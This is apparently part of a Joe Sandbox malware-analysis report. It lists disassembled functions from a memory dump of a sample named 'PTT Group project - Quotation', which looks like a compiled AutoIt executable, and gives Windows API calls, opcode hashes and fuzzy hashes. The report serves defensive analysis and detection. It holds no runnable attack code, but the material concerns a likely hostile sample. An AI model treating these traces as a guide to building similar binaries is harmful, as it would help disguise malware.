Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
Instruction ID: 11db6710b8e137f09fa7b8d442f4f1255f0924f879882ad849f08272154df268
Opcode Fuzzy Hash: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
Instruction Fuzzy Hash: D35160B1A04618AFDF249F64CC41BAEBB79EF88310F0144AEB20DA7241DB355E80CF59

Function 0093493A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 009349D0
__flush.LIBCMT ref: 009349F0
__write.LIBCMT ref: 00934A23
__flsbuf.LIBCMT ref: 00934A51

Part of subcall function 00938D68: __getptd_noexit.LIBCMT ref: 00938D68

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
Instruction ID: e9b0ee79de72e1a919fdb054279caf07c79c811a1bbf7d5e27dfc1866c48f325
Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
Instruction Fuzzy Hash: 1E41D3746407069BDF28CEA9C880AAF7BAAEF80760F25857DE855C7690D774ED408F44

Function 009173E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0094EE62
GetOpenFileNameW.COMDLG32(?), ref: 0094EEAC

Part of subcall function 009148AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009148A1,?,?,009137C0,?), ref: 009148CE

Part of subcall function 009309D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 009309F4

Strings

X, xrefs: 0094EE7A

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: 73a68bc32fd180c0cc2f9466d2e885786a0106ea0acc8ac3bbf14c3539dec575
Instruction ID: b4b03ab10be6f1b55e1f8dcbc08a0a338402ce3538dc7f5ef406e6df7535e249
Opcode Fuzzy Hash: 73a68bc32fd180c0cc2f9466d2e885786a0106ea0acc8ac3bbf14c3539dec575
Instruction Fuzzy Hash: 77219071A1425C9BCB11DF94C845BEEBBFDAF89314F04805AE408E7281DBB859898FA1

Function 0097901B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00979036
__fread_nolock.LIBCMT ref: 0097904B

Strings

EA06, xrefs: 0097907D

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: 9e03e70b828e9b2c2c1072c1dcb5b61716a9c7fba944d1d4b33dc70afeb94588
Instruction ID: 4b7229c8fe08bbd7585d10474189faa6d4052792c74acf376d7e3f6533be0e58
Opcode Fuzzy Hash: 9e03e70b828e9b2c2c1072c1dcb5b61716a9c7fba944d1d4b33dc70afeb94588
Instruction Fuzzy Hash: DD01F9729042186EDB28CAA8C816FFEBBFCDB05301F00419EF552D2181E575A6048B60

Function 00979B6D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00979B82
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00979B99

Strings

aut, xrefs: 00979B93

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 23714c1b62efaa371254be034797e269c58ea5a9a9abe07af16b8f2056256671
Instruction ID: 3dee8f3b2c66609954ffd349b61a6d68e45da615dd763669d4bf296099e84d16
Opcode Fuzzy Hash: 23714c1b62efaa371254be034797e269c58ea5a9a9abe07af16b8f2056256671
Instruction Fuzzy Hash: 92D05E7994430DABDB109B94DC0EF9AB72CE704704F0042A2BE64D10A1DEB055989B96

Function 0098CDF1 Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aabad7a0c14cbb8ef0b65e6bc770594cbe60cbadd3bcb42d160520c1e0a102fa
Instruction ID: fa0b0af11b778f297ad12c9becbefc889b6ae150b669f6eabc38dd111cc293fb
Opcode Fuzzy Hash: aabad7a0c14cbb8ef0b65e6bc770594cbe60cbadd3bcb42d160520c1e0a102fa
Instruction Fuzzy Hash: B2F116716083059FC714EF28C484A6ABBE5BFC8314F54892EF8999B391D731E945CF82

Function 0091F8CF Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON

Download Yara Rule

APIs

Part of subcall function 009303A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 009303D3
Part of subcall function 009303A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 009303DB
Part of subcall function 009303A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 009303E6
Part of subcall function 009303A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 009303F1
Part of subcall function 009303A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 009303F9
Part of subcall function 009303A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00930401

Part of subcall function 00926259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0091FA90), ref: 009262B4

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0091FB2D
OleInitialize.OLE32(00000000), ref: 0091FBAA
CloseHandle.KERNEL32(00000000), ref: 009549F2

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: 49ec1f8a96281449a82b379d515ce80d43b56e34049710a6ee9d4f278002c5e5
Instruction ID: 49b46580d0ee265ac824b1fc38bd9a691ea68c190b6d295cc2abab501b595340
Opcode Fuzzy Hash: 49ec1f8a96281449a82b379d515ce80d43b56e34049710a6ee9d4f278002c5e5
Instruction Fuzzy Hash: 0D81B8B0AAA3448EC394DF69EA50655BBF5FB99308710812FE018C73B6EB354484EF50

Function 009143DB Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00914401
Shell_NotifyIconW.SHELL32(00000000,?), ref: 009144A6
Shell_NotifyIconW.SHELL32(00000001,?), ref: 009144C3

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: 25776a00ae17ee20e4bed61eb94b2d7015ed4bc92aa3e71b79f01b66a8b34074
Instruction ID: fd7e9f39ac9c01b8c145c3998cdc1b02b375fee40ab1cb6e343e3a8ed49c8778
Opcode Fuzzy Hash: 25776a00ae17ee20e4bed61eb94b2d7015ed4bc92aa3e71b79f01b66a8b34074
Instruction Fuzzy Hash: 84316FB16097059FD721DF24D8847DBBBF8FB48304F00092EE69AC3291D775A984DB92

Function 0093594C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00935963

Part of subcall function 0093A3AB: __NMSG_WRITE.LIBCMT ref: 0093A3D2
Part of subcall function 0093A3AB: __NMSG_WRITE.LIBCMT ref: 0093A3DC

__NMSG_WRITE.LIBCMT ref: 0093596A

Part of subcall function 0093A408: GetModuleFileNameW.KERNEL32(00000000,009D43BA,00000104,?,00000001,00000000), ref: 0093A49A
Part of subcall function 0093A408: ___crtMessageBoxW.LIBCMT ref: 0093A548

Part of subcall function 009332DF: ___crtCorExitProcess.LIBCMT ref: 009332E5
Part of subcall function 009332DF: ExitProcess.KERNEL32 ref: 009332EE

Part of subcall function 00938D68: __getptd_noexit.LIBCMT ref: 00938D68

RtlAllocateHeap.NTDLL(00FA0000,00000000,00000001,00000000,?,?,?,00931013,?), ref: 0093598F

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 959a171f2ffdeb9587f79e12ab6ac0ee62a4119877834e74c0ae800d1a306339
Instruction ID: 5351b706325b69e361ae73ec61a6c375491f5883c94e5051dfa49c2b9f9a26aa
Opcode Fuzzy Hash: 959a171f2ffdeb9587f79e12ab6ac0ee62a4119877834e74c0ae800d1a306339
Instruction Fuzzy Hash: 1101F135285B11DFE6212B24EC52B6EB38C8F86B30F92002AF914AA1D1DE709D419E60

Function 00979B2C Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,009797D2,?,?,?,?,?,00000004), ref: 00979B45
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,009797D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00979B5B
CloseHandle.KERNEL32(00000000,?,009797D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00979B62

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 18b366a8a6a33cde75bd080ec71c86f82642d7b8b98c5609c15300be4056d1de
Instruction ID: 0c3c62954acca0e1b7f157c2b21afdf3f01875372dd5d47e107eed4eca2567f3
Opcode Fuzzy Hash: 18b366a8a6a33cde75bd080ec71c86f82642d7b8b98c5609c15300be4056d1de
Instruction Fuzzy Hash: 30E08632184214F7D7311B68EC0AFCABB18EB05761F108121FB14A90E087B16511A7D8

Function 00978F97 Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00978FA5

Part of subcall function 00932F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00939C64), ref: 00932FA9
Part of subcall function 00932F95: GetLastError.KERNEL32(00000000,?,00939C64), ref: 00932FBB

_free.LIBCMT ref: 00978FB6
_free.LIBCMT ref: 00978FC8

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
Instruction ID: ccfde0c6ea752727f9144d6fb67a895134085e4501880a03bd0157f17da3cb3b
Opcode Fuzzy Hash: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
Instruction Fuzzy Hash: FAE012B260D7015ACA24A678AD49BA35BEF5F88360B18081DF40DDB142DE24E8418564

Function 0091AB23 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

CALL, xrefs: 0095002B

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: 63061c02cb592409911ae5210ac187e1f0ecd8de0875ad8205246a9dad369dc7
Instruction ID: 0dff07a0d4d6fc256b17d291b8bd783a3355aa8290af2d92500aa55266c14e58
Opcode Fuzzy Hash: 63061c02cb592409911ae5210ac187e1f0ecd8de0875ad8205246a9dad369dc7
Instruction Fuzzy Hash: 85224774609345DFCB24DF14C490BAABBE5BF89300F15895DE89A8B362D735EC85CB82

Function 00914DD0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00914E1A

Strings

EA06, xrefs: 0094DCF5

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: _memmove
String ID: EA06
API String ID: 4104443479-3962188686
Opcode ID: b00814bbd8fcfbb35f380cf99f0290c421949b777cb8ef721929b136cb96367c
Instruction ID: cc70e5295337780affa6f95ae22ac32e72d7e0c18fb12e681bcec5ae41418e7e
Opcode Fuzzy Hash: b00814bbd8fcfbb35f380cf99f0290c421949b777cb8ef721929b136cb96367c
Instruction Fuzzy Hash: EB41AD71B0415C9BCF214B649891BFE7FAAAB8D300F694475E8829B282C6258DC187E2

Function 0091492E Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00914992

Part of subcall function 009335AC: __lock.LIBCMT ref: 009335B2
Part of subcall function 009335AC: DecodePointer.KERNEL32(00000001,?,009149A7,009681BC), ref: 009335BE
Part of subcall function 009335AC: EncodePointer.KERNEL32(?,?,009149A7,009681BC), ref: 009335C9

Part of subcall function 00914A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00914A73
Part of subcall function 00914A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00914A88

Part of subcall function 00913B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00913B7A
Part of subcall function 00913B4C: IsDebuggerPresent.KERNEL32 ref: 00913B8C
Part of subcall function 00913B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,009D62F8,009D62E0,?,?), ref: 00913BFD
Part of subcall function 00913B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00913C81

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 009149D2

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: ffeb8984ee40fa7c7d887643dea5ec99339e58a945e2cfb188c0f7a87e73dc9f
Instruction ID: 4981e0df95943054c75acb4f255dc766030adfe2ca9915cfafcabf51160a8fa1
Opcode Fuzzy Hash: ffeb8984ee40fa7c7d887643dea5ec99339e58a945e2cfb188c0f7a87e73dc9f
Instruction Fuzzy Hash: B0116771A693159BC700EF68E905A4AFBE8EFD8710F00891BF155872B1DB709688DB92

Function 00915DF9 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00915981,?,?,?,?), ref: 00915E27
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00915981,?,?,?,?), ref: 0094E19C

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 1d0a1149c07e8dadfa589e12a8fbea91dd984b82b6b43aabf8a8d8880357afc0
Instruction ID: c4000d6f336bbe8314d4095ffa362dea5d432c24e887a4655f0cc155a62978b8
Opcode Fuzzy Hash: 1d0a1149c07e8dadfa589e12a8fbea91dd984b82b6b43aabf8a8d8880357afc0
Instruction Fuzzy Hash: D001967078870CFEF3640E14CC86FA6769CAB05768F118315BAE55A1D0C6B41D858B54

Function 00930FF6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0093594C: __FF_MSGBANNER.LIBCMT ref: 00935963
Part of subcall function 0093594C: __NMSG_WRITE.LIBCMT ref: 0093596A
Part of subcall function 0093594C: RtlAllocateHeap.NTDLL(00FA0000,00000000,00000001,00000000,?,?,?,00931013,?), ref: 0093598F

std::exception::exception.LIBCMT ref: 0093102C
__CxxThrowException@8.LIBCMT ref: 00931041

Part of subcall function 009387DB: RaiseException.KERNEL32(?,?,?,009CBAF8,00000000,?,?,?,?,00931046,?,009CBAF8,?,00000001), ref: 00938830

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: 8222bc700ef3c60c911e29905779e85bc5f4201baf6945a55045f661e0c465fd
Instruction ID: 232ac9b19c1efb61dcf1b99e35ba6b64d0a4d55ee667f0ed45e9e3a7731490c8
Opcode Fuzzy Hash: 8222bc700ef3c60c911e29905779e85bc5f4201baf6945a55045f661e0c465fd
Instruction Fuzzy Hash: 63F0C83550431DA6CB34BB98EC06BDF77ECDF41355F100425F804A69A2DFB18A849AD1

Function 0093582D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0093585C
__lock_file.LIBCMT ref: 0093587D

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: b7b0ff04948718d434534a91a4e445339c7f246cfd93a297629fc451e66e76c8
Instruction ID: 76fea0797d3d06e7ecfc14cbe4c19d390f5281b820e62ba1e678dfd0f238d10a
Opcode Fuzzy Hash: b7b0ff04948718d434534a91a4e445339c7f246cfd93a297629fc451e66e76c8
Instruction Fuzzy Hash: 8C014F71C00709EBCF22AF698C06A9F7B75AFC8360F168215F8245B1A1DB358A21DF91

Function 009355D6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00938D68: __getptd_noexit.LIBCMT ref: 00938D68

__lock_file.LIBCMT ref: 0093561B

Part of subcall function 00936E4E: __lock.LIBCMT ref: 00936E71

__fclose_nolock.LIBCMT ref: 00935626

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

